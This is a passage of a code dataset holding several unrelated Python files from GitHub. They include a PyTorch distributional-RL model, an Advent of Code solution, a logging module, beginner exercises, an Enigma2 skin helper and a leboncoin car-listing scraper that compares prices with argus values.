\"\"\"\r\n        GOAL: Defining and initializing the Deep Neural Network.\r\n        \r\n        INPUTS: - numberOfInputs: Number of inputs of the Deep Neural Network.\r\n                - numberOfOutputs: Number of outputs of the Deep Neural Network.\r\n                - structureDNN: Structure of the feedforward DNN for state embedding.\r\n                - structureUMNN: Structure of the UMNN for distribution representation.\r\n                - stateEmbedding: Dimension of the state embedding.\r\n                - numberOfSteps: Number of integration steps for the UMNN.\r\n                - device: Hardware device (CPU or GPU).\r\n        \r\n        OUTPUTS: /\r\n        \"\"\"\r\n\r\n        # Call the constructor of the parent class (Pytorch torch.nn.Module)\r\n        super(UMDQN_W_Model, self).__init__()\r\n\r\n        # Initialization of the Deep Neural Network\r\n        self.stateEmbeddingDNN = FeedForwardDNN(numberOfInputs, stateEmbedding, structureDNN)\r\n        self.UMNN = 
MonotonicNN(stateEmbedding+1, structureUMNN, numberOfSteps, numberOfOutputs, device)\r\n\r\n    \r\n    def forward(self, state, taus):\r\n        \"\"\"\r\n        GOAL: Implementing the forward pass of the Deep Neural Network.\r\n        \r\n        INPUTS: - state: RL state.\r\n                - taus: Samples of taus.\r\n        \r\n        OUTPUTS: - output: Output of the Deep Neural Network.\r\n        \"\"\"\r\n        \r\n        # State embedding part of the Deep Neural Network\r\n        batchSize = state.size(0)\r\n        x = self.stateEmbeddingDNN(state)\r\n        x = x.repeat(1, int(len(taus)/len(state))).view(-1, x.size(1))\r\n\r\n        # UMNN part of the Deep Neural Network\r\n        x = self.UMNN(taus, x)\r\n\r\n        # Appropriate format\r\n        return torch.cat(torch.chunk(torch.transpose(x, 0, 1), batchSize, dim=1), 0)\r\n","repo_name":"ThibautTheate/Unconstrained-Monotonic-Deep-Q-Network-algorithm","sub_path":"Models/UMDQN_W_Model.py","file_name":"UMDQN_W_Model.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} {"seq_id":"13032819548","text":"import copy\nf = open(r\"2020\\python\\day17-input.txt\", \"r\")\n\ndef surroundingNumActive(grid, x, y, z):\n    count = 0\n    for z1 in range(z-1, z+2):\n        for y1 in range(y-1, y+2):\n            for x1 in range(x-1, x+2):\n                if (x1, y1, z1) == (x, y, z):\n                    continue\n                if (x1, y1, z1) in grid:\n                    count += 1\n    return count\n\ndef printGrid(grid, xmin, xmax, ymin, ymax, zmin, zmax, counts=False):\n    for z in range(zmin, zmax):\n        print(\"\\nz=\" + str(z))\n        for y in range(ymin, ymax):\n            line = \"\"\n            for x in range(xmin, xmax):\n                if(counts):\n                    line += str(surroundingNumActive(grid, x, y, z))\n                else:\n                    line += \"#\" if (x,y,z) in grid else \".\"\n            print(line)\n\ngrid = set()\n\nx = 0\ny = 0\nz = 0\n\nxmax = 0\nymax = 0\nzmax = 1\nxmin = 0\nymin = 0\nzmin = 0\nfor line in f:\n    for c in line.strip():\n        if c == '#':\n            grid.add((x,y,z))\n        x += 1\n        xmax = x\n    \n    y += 1\n    x = 0\nymax = y\n\nprintGrid(grid, xmin, xmax, ymin, ymax, zmin-1, zmax+1, counts=True)\ninitialGrid = copy.deepcopy(grid)\n\nfor i in range(6):\n    newGrid = copy.deepcopy(grid)\n\n    for z in range(zmin-1, zmax+1):\n        for y in range(ymin-1, ymax+1):\n            for x in range(xmin-1, xmax+1):\n                count = surroundingNumActive(grid, x, y, z)\n                if (x,y,z) in grid:\n                    if count != 2 and count != 3:\n                        newGrid.remove((x,y,z))\n                else:\n                    if count == 3:\n                        newGrid.add((x,y,z))\n\n    grid = copy.deepcopy(newGrid)\n    xmin -= 1\n    ymin -= 1\n    zmin -= 1\n    xmax += 1\n    ymax += 1\n    zmax += 1\n    printGrid(grid, xmin, xmax, ymin, ymax, zmin, zmax)\n\n\nprint(len(grid)) ","repo_name":"davidcbc/aoc","sub_path":"2020/python/day17-1.py","file_name":"day17-1.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"4794576184","text":"\"\"\"Handle routing output, errors, and exceptions to disk and screen\n\"\"\"\nimport logging\nimport sys\nimport time\nimport os\nimport uuid\nimport gnomon.Configuration as Configuration\n\n\ndef getLogLevels():\n    \"Return log levels that Python's logging facilities understand\"\n    return ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']\n\n\ndef addLogLevelOptionToArgs(parser):\n    \"\"\"Add log level arguments to command line parser\n\n    This is not in the schema because the log level needs to be known when\n    setting up the Configuration classes\n    \"\"\"\n    parser.add_argument('--log_level',\n                        choices=getLogLevels(),\n                        default='INFO')\n\n\nclass StreamToLogger(object):\n    \"Fake file-like stream object that redirects writes to a logger 
instance.\"\n\n def __init__(self, logger, log_level=logging.INFO):\n self.logger = logger\n self.log_level = log_level\n\n def write(self, buf):\n for line in buf.rstrip().splitlines():\n self.logger.log(self.log_level, line.rstrip())\n\n\ndef setupLogging(console_level, name):\n config = Configuration.GLOBAL_CONFIG\n\n output_filename = 'gnomon_%s_%s.log' % (name, str(uuid.uuid4()))\n\n output_filename = os.path.join(config['log_dir'],\n output_filename)\n\n logging.basicConfig(filename=output_filename, mode='w',\n level=logging.DEBUG)\n\n console_handler = logging.StreamHandler(sys.__stdout__)\n console_handler.setLevel(console_level)\n formatter = logging.Formatter('%(levelname)s(%(name)s): %(message)s')\n console_handler.setFormatter(formatter)\n\n logger = logging.getLogger('root')\n logger.addHandler(console_handler)\n\n stdout_logger = logging.getLogger('root').getChild('STDOUT')\n sl = StreamToLogger(stdout_logger, logging.INFO)\n sys.stdout = sl\n\n stderr_logger = logging.getLogger('root').getChild('STDERR')\n sl = StreamToLogger(stderr_logger, logging.ERROR)\n sys.stderr = sl\n\n logger.info('Starting up Gnomon (PID: %d)', os.getpid())\n\n logger.info('Using log filename: %s', output_filename)\n\n logger.info('Start time: %s', time.ctime())\n","repo_name":"nuSTORM/gnomon","sub_path":"gnomon/Logging.py","file_name":"Logging.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8142829883","text":"\"\"\"\n날짜:2021/05/03\n이름:고현석\n내용:파이썬 예외처리 실습 교재 p212\n\n\"\"\"\n\n# n,m,k를 공백으로 구분하여 입력받기\nn,m,k = map(int,input().split())\n\n# n개의 숫자를 공���으로 구분하여 입력받기\ndata = list(map(int,input().split()))\n\n# 내림차순 정렬\ndata.sort(reverse=True)\n\n# 첫번째 숫자\nfirst = data[0]\n\n# 두번째 숫자\nsecond = data[1]\n\nresult = 0\nrepeat = k # k값을 보존해야함\nfor i in range(m):\n\n if repeat > 0:\n result += first\n repeat -= 1\n else:\n result += second\n repeat = k\n\nprint(result)\n\n","repo_name":"pkc-3/python","sub_path":"Codingtest/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26709648412","text":"# CAP5415 Computer Vision\r\n# Programmin Assignment 2, Question 1\r\n# KNN Classifier for MNIST Dataset\r\n# Date: 11/9/2021\r\n# Author: Katarina Vuckovic\r\n\r\nfrom numpy import load\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport statistics\r\nimport time\r\nimport scipy\r\nfrom scipy import ndimage\r\nfrom sklearn import datasets, svm, metrics\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.datasets import load_digits\r\n\r\n\r\n\r\n# Define L2-norm function that is used to calculate the distance between two samples. 
\r\ndef l2norm(actual_value,predicted_value):\r\n    l2 = np.sum(np.power((actual_value-predicted_value),2))\r\n    return (l2)\r\n\r\n\r\n#implementation of NN \r\ndef NN(X_test,X_train,y_train):\r\n    predicted_value = X_test\r\n    i = 0\r\n    l2 = np.zeros([len(X_train),1])\r\n    for train in X_train:\r\n        l2[i] = l2norm(train,predicted_value)\r\n        i +=1\r\n    #print(l2)\r\n    predicted_digit = y_train[np.argmin(l2)]\r\n    return predicted_digit\r\n\r\n#implementation of KNN for K>=1\r\ndef KNN(X_test,X_train,y_train,K):\r\n    predicted_value = X_test\r\n    i = 0\r\n    l2 = np.zeros([len(X_train),1])\r\n    predicted_digit = np.zeros([K,1])\r\n    for train in X_train:\r\n        l2[i] = l2norm(train,predicted_value)\r\n        i +=1\r\n    #print(l2)\r\n    min_index = l2[:,0].argsort()[:K]\r\n    pred_k_digits = y_train[min_index]\r\n    (unique, counts) = np.unique(pred_k_digits, return_counts=True)\r\n    if (np.max(counts)>0):\r\n        pred = unique[np.argmax(counts)]\r\n    else:\r\n        print('error')\r\n    return pred\r\n\r\n\r\n# Import data and split into testing and training datasets\r\ndigits = load_digits()\r\n# flatten the images\r\nn_samples = len(digits.images)\r\nprint(n_samples)\r\ndata = digits.images.reshape((n_samples, -1))\r\n# Split data such that testing is 500 samples\r\n# 500/1797 = 0.2777 (note: n_samples = 1797)\r\nX_train, X_test, y_train, y_test = train_test_split( data, digits.target, test_size=0.2777, shuffle=False)\r\n\r\n\r\n# Calculating accuracy for NN (K=1)\r\nresult = np.zeros([len(y_test),1]) \r\npred = np.zeros([len(y_test),1]) \r\n#print(result)\r\nfor i in range(len(y_test)):\r\n    pred[i] = NN(X_test[i,:],X_train,y_train)\r\n    if(pred[i]==y_test[i]):\r\n        result[i] = 1\r\n    else:\r\n        result[i] = 0\r\n\r\npercent = np.sum(result)/500\r\nprint('percentage correct for NN (k=1):',percent)\r\n\r\n# calculate accuracy for k>1\r\nresult = np.zeros([len(y_test),1]) \r\npred = np.zeros([len(y_test),1]) \r\nK = 7\r\nfor k in range(1,K+1):\r\n    percent = 0\r\n    print(k)\r\n    for i in range(len(y_test)):\r\n        pred[i] = KNN(X_test[i,:],X_train,y_train,k)\r\n        if(pred[i]==y_test[i]):\r\n            result[i] = 1\r\n        else:\r\n            result[i] = 0\r\n    percent = np.sum(result)/500\r\n    print('percentage correct for k =',k,': ',percent)\r\n","repo_name":"katarinavuckovic/CAP5415","sub_path":"PA2/KNN/KNN_MNIST.py","file_name":"KNN_MNIST.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"5232551156","text":"class Email:\r\n    def __init__(self, from_address, subject_line, email_contents):\r\n        self.from_address = from_address\r\n        self.subject_line = subject_line\r\n        self.email_contents = email_contents\r\n        self.has_been_read = False\r\n        self.is_spam = False\r\n    \r\n    def mark_as_read(self):\r\n        self.has_been_read = True\r\n    \r\n    def mark_as_spam(self):\r\n        self.is_spam = True\r\n    \r\nclass Inbox:\r\n    def __init__(self):\r\n        self.emails = [] # Empty list\r\n    \r\n    def add_email(self, from_address, subject_line, email_contents):\r\n        email = Email(from_address, subject_line, email_contents)\r\n        self.emails.append(email) # Append new email objects to list\r\n    \r\n    def list_messages_from_sender(self, sender_address):\r\n        # Build list of email objects if email.from = email.sender\r\n        messages = [email for email in self.emails if email.from_address == sender_address] \r\n        output = \"\"\r\n        # Return output string of the subject line for those objects, with an index number\r\n        for i, message in enumerate(messages):\r\n            output += f\"{i} {message.subject_line}\\n\"\r\n        return 
output\r\n \r\n def get_email(self, sender_address, index):\r\n #As above\r\n messages = [email for email in self.emails if email.from_address == sender_address]\r\n # Get email based on input index, return and mark as read\r\n email = messages[index]\r\n email.mark_as_read()\r\n return email\r\n \r\n def mark_as_spam(self, sender_address, index):\r\n # As above, but mark as spam\r\n messages = [email for email in self.emails if email.from_address == sender_address]\r\n email = messages[index]\r\n email.mark_as_spam()\r\n \r\n def get_unread_emails(self):\r\n # As above, but only get the subject line of unread emails\r\n unread_emails = [email.subject_line for email in self.emails if not email.has_been_read]\r\n # Return string of subject_line arguments separated by a \\n\r\n output = \"\" \r\n for email in unread_emails:\r\n output += f\"{email}\\n\"\r\n return output\r\n \r\n def get_spam_emails(self):\r\n # As above, but for spam only\r\n spam_emails = [email.subject_line for email in self.emails if email.is_spam]\r\n output = \"\"\r\n for email in spam_emails:\r\n output += f\"{email}\\n\"\r\n return output\r\n \r\n def delete(self, sender_address, index):\r\n # Delete email given address and index\r\n messages = [email for email in self.emails if email.from_address == sender_address]\r\n self.emails.remove(messages[index])\r\n\r\nusage_message = '''\r\nWelcome to the email system! What would you like to do?\r\n\r\ns - send email.\r\nl - list emails from a sender.\r\nr - read email.\r\nm - mark email as spam.\r\ngu - get unread emails.\r\ngs - get spam emails.\r\nd - delete email.\r\ne - exit this program.\r\n'''\r\n\r\ninbox = Inbox()\r\nuser_choice = \"\"\r\n\r\nwhile True:\r\n \r\n # Lowercase and remove spaces\r\n user_choice = input(usage_message).strip().lower() \r\n\r\n#=====#\r\n\r\n if user_choice == \"s\":\r\n # Send an email (Create a new Email object)\r\n sender_address = input(\"Enter the address of the sender:\\n\")\r\n subject_line = input(\"Enter the subject line of the email:\\n\")\r\n email_contents = input(\"Enter the contents of the email:\\n\")\r\n \r\n # Now add the email to the Inbox\r\n inbox.add_email(sender_address, subject_line, email_contents)\r\n \r\n # Print a success message\r\n print(\"Congratulations, your email has been sent!\\n\")\r\n print(f\"Subject: {subject_line}\\nFrom: {sender_address}\\nContents: {email_contents}\")\r\n\r\n#=====#\r\n \r\n elif user_choice == \"l\":\r\n\r\n # List all emails from a sender_address\r\n sender_address = input(\"Please enter the sender address:\\n\")\r\n \r\n # Now list all emails from this sender\r\n print(inbox.list_messages_from_sender(sender_address))\r\n\r\n#=====#\r\n\r\n elif user_choice == \"r\":\r\n \r\n # Step 1: show emails from the sender\r\n sender_address = input(\"Please enter the sender address:\\n\")\r\n \r\n # Step 2: show all emails from this sender (with indexes)\r\n messages = inbox.list_messages_from_sender(sender_address)\r\n print(messages)\r\n \r\n # Step 3: ask the user for the index of the email\r\n email_index = int(input(\"Please enter the index of the email that you would like to read:\\n\"))\r\n \r\n # Step 4: display the email\r\n email = inbox.get_email(sender_address, email_index)\r\n print(f\"Subject Line: {email.subject_line}\\nFrom Address: {email.from_address}\\nEmail Contents: {email.email_contents}\")\r\n\r\n#=====#\r\n \r\n elif user_choice == \"m\":\r\n\r\n # Step 1: show emails from the sender\r\n sender_address = input(\"Please enter the sender address:\\n\")\r\n \r\n # 
Step 2: show all emails from this sender (with indexes)\r\n        messages = inbox.list_messages_from_sender(sender_address)\r\n        print(messages)\r\n        \r\n        # Step 3: ask the user for the index of the email\r\n        email_index = int(input(\"Please enter the index of the spam email:\\n\"))\r\n        \r\n        # Step 4: mark the email as spam\r\n        inbox.mark_as_spam(sender_address, email_index)\r\n\r\n        # Step 5: print a success message\r\n        print(\"Email has been marked as spam\")\r\n\r\n#=====#\r\n    \r\n    elif user_choice == \"gu\":\r\n        \r\n        # Get unread emails\r\n        print(inbox.get_unread_emails())\r\n\r\n#=====#\r\n    \r\n    elif user_choice == \"gs\":\r\n        \r\n        # Get spam emails\r\n        print(inbox.get_spam_emails())\r\n\r\n#=====#\r\n\r\n    elif user_choice == \"d\":\r\n\r\n        # Step 1: show emails from the sender\r\n        sender_address = input(\"Please enter the sender address:\\n\")\r\n\r\n        # Step 2: show all emails from this sender (with indexes)\r\n        messages = inbox.list_messages_from_sender(sender_address)\r\n        print(messages)\r\n\r\n        # Step 3: ask the user for the index of the email\r\n        email_index = int(input(\"Please enter the index of the email that you would like to delete:\\n\"))\r\n\r\n        # Step 4: delete the email\r\n        inbox.delete(sender_address, email_index)\r\n\r\n        # Step 5: print a success message\r\n        print(\"Email has been deleted\")\r\n\r\n#=====#\r\n\r\n    elif user_choice == \"e\":\r\n\r\n        # Exit the program ('e' is offered in the menu above)\r\n        break\r\n\r\n    else:\r\n        print(\"Oops - incorrect input\")","repo_name":"liambiam/Email-Client","sub_path":"email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":6440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"75171056746","text":"# -*- coding: utf-8 -*-\n\n# Kraven Tool\n#\n# Coded/Modified/Adapted by örlgrey\n# Based on VTi and/or OpenATV image source code\n#\n# This code is licensed under the Creative Commons \n# Attribution-NonCommercial-ShareAlike 3.0 Unported \n# License. 
To view a copy of this license, visit\n# http://creativecommons.org/licenses/by-nc-sa/3.0/ \n# or send a letter to Creative Commons, 559 Nathan \n# Abbott Way, Stanford, California 94305, USA.\n#\n# If you think this license infringes any rights,\n# please contact me at ochzoetna@gmail.com\n\nfrom enigma import eTimer\nfrom Screens.InfoBar import InfoBar\n\nclass KravenTool:\n\n\tdef __init__(self):\n\t\tself.fb_proc_path = '/proc/stb/vmpeg'\n\t\tself.fb_info = ['dst_width',\n\t\t 'dst_height',\n\t\t 'dst_left',\n\t\t 'dst_top']\n\t\tself.new_fb_size_pos = None\n\t\tself.decoder = None\n\t\tself.delayTimer = None\n\t\tself.is_PiG = False\n\t\treturn\n\n\tdef getFBSize(self, decoder = 0):\n\t\tret = []\n\t\tfor val in self.fb_info:\n\t\t\tf = open('%s/%d/%s' % (self.fb_proc_path, decoder, val), 'r')\n\t\t\tfb_val = f.read().strip()\n\t\t\tret.append(fb_val)\n\t\t\tf.close()\n\n\t\tif len(ret) == 4:\n\t\t\treturn ret\n\t\telse:\n\t\t\treturn None\n\n\tdef setFBSize(self, fb_size_pos, decoder = 0, force = False):\n\t\tif self.delayTimer:\n\t\t\tself.delayTimer.stop()\n\t\tif InfoBar.instance and InfoBar.instance.session.pipshown or force:\n\t\t\tif fb_size_pos and len(fb_size_pos) >= 4:\n\t\t\t\ti = 0\n\t\t\t\tfor val in self.fb_info:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tf = open('%s/%d/%s' % (self.fb_proc_path, decoder, val), 'w')\n\t\t\t\t\t\tfb_val = fb_size_pos[i]\n\t\t\t\t\t\tf.write(fb_val)\n\t\t\t\t\t\tf.close()\n\t\t\t\t\texcept IOError:\n\t\t\t\t\t\tpass\n\n\t\t\t\t\ti += 1\n\n\t\t\t\tfor val in ('00000001', '00000000'):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tf = open('%s/%d/%s' % (self.fb_proc_path, decoder, 'dst_apply'), 'w')\n\t\t\t\t\t\tf.write(val)\n\t\t\t\t\t\tf.close()\n\t\t\t\t\texcept IOError:\n\t\t\t\t\t\tpass\n\n\tdef delayTimerFinished(self):\n\t\tfb_size_pos = self.new_fb_size_pos\n\t\tdecoder = self.decoder\n\t\tself.new_fb_size_pos = None\n\t\tself.decoder = None\n\t\tif not self.is_PiG:\n\t\t\tself.setFBSize(fb_size_pos, decoder)\n\t\treturn\n\n\tdef setFBSize_delayed(self, fb_size_pos, decoder = 0, delay = 1000):\n\t\tif fb_size_pos and len(fb_size_pos) >= 4:\n\t\t\tself.new_fb_size_pos = fb_size_pos\n\t\t\tself.decoder = decoder\n\t\t\tself.delayTimer = eTimer()\n\t\t\tself.delayTimer.callback.append(self.delayTimerFinished)\n\t\t\tself.delayTimer.start(delay)\n","repo_name":"oerlgrey/KravenHD","sub_path":"usr/lib/enigma2/python/Plugins/Extensions/KravenHD/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"21388858098","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom multiprocessing import Pool\nimport time\nimport pylev\nimport pandas as pd\nimport re\nimport os\nimport matplotlib as plt\nimport seaborn\n\n\n# url = 'https://www.leboncoin.fr/voitures/offres/ile_de_france/?th=1&q=Renault%20Zoe&parrot=0'\nurl_base = 'https://www.leboncoin.fr/voitures/offres/{0}/?th=1&q=Renault%20Zoe&parrot=0'\ndf_zoe = pd.DataFrame(\n columns=['region', 'url', 'price', 'year', 'kilometrage', 'version', 'telephone', 'description', 'vendeur',\n 'argus'])\nregion_list_full = ('ile_de_france', 'provence_alpes_cote_d_azur', 'aquitaine')\n\n\ndef car_url_list(region, url):\n result = requests.get(url).text\n soup = BeautifulSoup(result, 'html.parser')\n df_zoe_tmp1 = pd.DataFrame(\n columns=['region', 'url', 'price', 'year', 'kilometrage', 'version', 'telephone', 'description', 'vendeur',\n 'argus'])\n\n for index_url in 
range(len(soup.main.find_all('ul')[0].find_all('li'))):\n        ad_list_id = soup.main.find_all('ul')[0].find_all('li')[int(index_url)] \\\n            .a['data-info'].split(',')[2].split(':')[1].replace('\\\"', '').replace(' ', '')\n\n        # is_pro = soup.main.find_all('ul')[0].find_all('li')[int(el)].find_all(class_='ispro').text\n        # BeautifulSoup(requests.get('https://www.leboncoin.fr/voitures/offres/ile_de_france/?th=1&q=Renault%20Zoe&parrot=0').text, 'html.parser').main.find_all('ul')[0].find_all('li')[int(el)].find_all(class_='ispro').text\n\n        new_url = soup.main.find_all('ul')[0].find_all('li')[int(index_url)].a['href'].replace('//', 'https://')\n\n        df_zoe_tmp1 = df_zoe_tmp1.append([{'id': ad_list_id, 'region': region, 'url': new_url}], ignore_index=True)\n\n    return df_zoe_tmp1\n\n\ndef extract_urls_car(region_list, url_b):\n    df_zoe_tmp2 = pd.DataFrame(\n        columns=['region', 'url', 'price', 'year', 'kilometrage', 'version', 'telephone', 'description', 'vendeur',\n                 'argus'])\n\n    for region_i in region_list:\n        df_zoe_tmp2 = pd.concat([df_zoe_tmp2, car_url_list(region_i, url_b.format(region_i))])\n    df_zoe_tmp2.reset_index()\n    return df_zoe_tmp2\n\n\ndef extract_characteristics(url, region_url):\n    df_zoe_tmp3 = pd.DataFrame(\n        columns=['region', 'url', 'price', 'year', 'kilometrage', 'version', 'telephone', 'description', 'vendeur',\n                 'argus'])\n    result = requests.get(url).text\n    soup = BeautifulSoup(result, 'html.parser')\n\n    vendeur_tmp = soup.find_all(class_='line line_pro noborder')[0].text\n    if re.search(\"(?i)(Num(é|e)ro)( )*(SIREN)(\\s*:*\\s*)(?P<siren>\\w+)\", vendeur_tmp) is not None:\n        vendeur = 'Numéro SIREN : ' + re.search(\"(?i)(Num(é|e)ro)( )*(SIREN)(\\s*:*\\s*)(?P<siren>\\w+)\", vendeur_tmp)\\\n            .group('siren')\n    else:\n        vendeur = 'Particulier'\n\n    characteristics_price_tmp = (soup.find_all(class_='line')[2].text.replace(' ', '') \\\n                                 .replace(u'\\n', '').replace('nan', '') \\\n                                 .replace('Prix', '').replace(u'\\xa0', '').replace('€', ''))\n\n    if re.search('([0-9]+)', characteristics_price_tmp) is not None:\n        characteristics_price = float(re.search('([0-9]+)', characteristics_price_tmp).group(0))\n    else:\n        characteristics_price = 0\n\n\n    characteristics_year_tmp = soup.find_all(class_='line')[6].text.replace(' ', '') \\\n        .replace(u'\\n', '').replace(u'\\xa0', '').replace('Année-modèle', '')\n\n    if re.search('([0-9]+)', characteristics_year_tmp) is not None:\n        characteristics_year = re.search('([0-9]+)', characteristics_year_tmp).group(0)\n    else:\n        characteristics_year = 0\n\n\n    characteristics_kilometrage_tmp = soup.find_all(class_='line')[7].text.replace('Kilométrage', '').replace('KM', '')\\\n        .replace(' ', '').replace(u'\\n', '').replace(u'\\xa0', '').replace(u'\\t', '')\n\n    if re.search('([0-9]+)', characteristics_kilometrage_tmp) is not None:\n        characteristics_kilometrage = re.search('([0-9]+)', characteristics_kilometrage_tmp).group(0)\n    else:\n        characteristics_kilometrage = 0\n\n\n    # shorthand selector\n    # .select(\".tabscontent > ul > li > a\")\n\n    characteristics_version_full = soup.find_all(class_='no-border')[0].text\n\n    # soup.text.replace(u'\\n', '').replace(u'\\t', '').strip()\n\n    characteristics_description = soup.find_all(class_='line properties_description')[0].text.replace(u'\\n', '') \\\n        .replace('Description :', '')\n\n    if re.search('((0|\\\\+33|0033)[1-9][0-9]{8})|((0|\\\\+33|0033)[1-9] [0-9]{2} [0-9]{2} [0-9]{2} [0-9]{2})|((0|\\\\+33|0033)[1-9].[0-9]{2}.[0-9]{2}.[0-9]{2}.[0-9]{2})', characteristics_description) is not None:\n        tel_clean = 
re.search('((0|\\\\+33|0033)[1-9][0-9]{8})|((0|\\\\+33|0033)[1-9] [0-9]{2} [0-9]{2} [0-9]{2} [0-9]{2})|((0|\\\\+33|0033)[1-9].[0-9]{2}.[0-9]{2}.[0-9]{2}.[0-9]{2})', characteristics_description).group(0)\n    else:\n        tel_clean = 'NaN'\n\n\n\n    if re.search('(INTENS|ZEN|LIFE)', characteristics_version_full.upper()) is not None:\n        version_clean = re.search('(INTENS|ZEN|LIFE)', characteristics_version_full.upper()).group(0)\n        if re.search('(TYPE(\\s)?2)', characteristics_version_full.upper()) is not None:\n            version_clean = version_clean + ' ' + re.search('(TYPE(\\s)?2)', characteristics_version_full.upper()).group(0)\n    else:\n        if re.search('(INTENS|ZEN|LIFE)', soup.main.h1.text.upper()) is not None:\n            version_clean = re.search('(INTENS|ZEN|LIFE)', soup.main.h1.text.upper()).group(0)\n            if re.search('(TYPE(\\s)?2)', soup.main.h1.text.upper()) is not None:\n                version_clean = version_clean + ' ' + re.search('(TYPE(\\s)?2)', soup.main.h1.text.upper()).group(0)\n        else:\n            version_clean = 'LIFE'\n\n\n    df_zoe_tmp3 = df_zoe_tmp3.append([{'region': region_url,\n                                       'url': url,\n                                       'price': characteristics_price,\n                                       'year': characteristics_year,\n                                       'kilometrage': characteristics_kilometrage,\n                                       'version': version_clean,\n                                       'telephone': tel_clean,\n                                       'description': characteristics_description,\n                                       'vendeur': vendeur}], ignore_index=True)\n    return df_zoe_tmp3\n\n\n# Pool.map(extract_characteristics(), listURLGlob)\n\ndef save_car_data(df_url_to_crawl):\n    for url_car in df_url_to_crawl['url']:\n        df_zoe_tmp4 = pd.DataFrame(\n            columns=['region', 'url', 'price', 'year', 'kilometrage', 'version', 'telephone', 'description', 'vendeur',\n                     'argus'])\n        df_zoe_tmp4 = extract_characteristics(url_car, df_url_to_crawl[df_url_to_crawl['url'] == url_car]['region'])\n\n        df_url_to_crawl.loc[df_url_to_crawl.url == url_car, 'price'] = float(df_zoe_tmp4[df_zoe_tmp4['url'] == url_car][\n            'price'].values)\n        df_url_to_crawl.loc[df_url_to_crawl.url == url_car, 'year'] = df_zoe_tmp4[df_zoe_tmp4['url'] == url_car][\n            'year'].values\n        df_url_to_crawl.loc[df_url_to_crawl.url == url_car, 'kilometrage'] = df_zoe_tmp4[df_zoe_tmp4['url'] == url_car][\n            'kilometrage'].values\n        df_url_to_crawl.loc[df_url_to_crawl.url == url_car, 'version'] = df_zoe_tmp4[df_zoe_tmp4['url'] == url_car][\n            'version'].values\n        df_url_to_crawl.loc[df_url_to_crawl.url == url_car, 'telephone'] = df_zoe_tmp4[df_zoe_tmp4['url'] == url_car][\n            'telephone'].values\n        df_url_to_crawl.loc[df_url_to_crawl.url == url_car, 'description'] = df_zoe_tmp4[df_zoe_tmp4['url'] == url_car][\n            'description'].values\n        df_url_to_crawl.loc[df_url_to_crawl.url == url_car, 'vendeur'] = df_zoe_tmp4[df_zoe_tmp4['url'] == url_car][\n            'vendeur'].values\n    return df_url_to_crawl\n\n\ndef export_data_car(df):\n    path = os.path.realpath('')\n    df.to_csv(path + '/dataset_zoe.csv', sep=';', header=True, index=False)\n\n\n# Retrieve all existing versions per year, to compare against the leboncoin description\ndef get_argus(db_zoe):\n    root_path = 'http://www.lacentrale.fr/'\n    df_argus = pd.DataFrame(\n        columns=['year', 'url_c', 'version', 'argus'])\n\n    for el in db_zoe[['year']].drop_duplicates().values:\n        if str(el[0])[:2] == '20' and el[0] != '':\n            caract_year = str(el[0])\n            url_global_search = 'http://www.lacentrale.fr/cote-voitures-renault-zoe--' + str(el[0]) + '-.html'\n\n            requests_glob = requests.get(url_global_search)\n            glob_soup = BeautifulSoup(requests_glob.text, \"html.parser\")\n\n            for el_tmp in glob_soup.find_all(class_=\"listingResultLine f14 auto\"):\n                caract_url = el_tmp.a.attrs['href']\n                
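# the h3 tag on each listing row carries the version label\n                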
caract_version = el_tmp.a.h3.text\n\n                url_tmp = root_path + caract_url\n                requests_argus_tmp = requests.get(url_tmp)\n                argus_soup_tmp = BeautifulSoup(requests_argus_tmp.text, \"html.parser\")\n                argus_price_tmp = (argus_soup_tmp.find_all(\"strong\", class_=\"f24\")[0].text.replace(' ', '') \\\n                                   .replace(u'\\n', '').replace('nan', '') \\\n                                   .replace('Prix', '').replace(u'\\xa0', '').replace('€', ''))\n\n                if re.search('([0-9]+)', argus_price_tmp) is not None:\n                    argus_price = float(re.search('([0-9]+)', argus_price_tmp).group(0))\n                else:\n                    argus_price = 0\n\n                print(str(caract_year) + ' : ' + str(caract_version) + ' : ' + str(url_tmp) + ' : ' + str(argus_price))\n                df_argus = df_argus.append([{'year': caract_year\n                                                , 'url_c': url_tmp\n                                                , 'version': caract_version\n                                                , 'argus': argus_price}]\n                                           , ignore_index=True)\n\n    path = os.path.realpath('')\n    df_argus.to_csv(path + '/dataset_argus_zoe.csv', sep=';', header=True, index=False)\n    return df_argus\n\n# Update the zoe DataFrame with the argus price, using the Levenshtein distance\ndef maj_argus_zoe(db_zoe, df_argus):\n    for el in db_zoe['id']:\n        text_description = db_zoe[db_zoe['id'] == el]['description'].values\n        text_version = db_zoe[db_zoe['id'] == el]['version'].values\n        year_tmp = db_zoe[db_zoe['id'] == el]['year'].values[0]\n        if str(year_tmp)[:2] == '20' and year_tmp != '':\n            df_argus_tmp = df_argus[df_argus.year == year_tmp]\n        else:\n            df_argus_tmp = df_argus\n\n        for el_argus in df_argus_tmp['version'].values:\n            df_argus_sub_tmp = df_argus_tmp\n\n            # Find the 'La centrale' zoe version closest to the leboncoin version (title/description)\n            df_argus_tmp.loc[df_argus_tmp.version == el_argus, 'select'] = pylev.levenshtein(text_description, str(el_argus))\n            df_argus_sub_tmp.loc[df_argus_sub_tmp.version == el_argus, 'select'] = 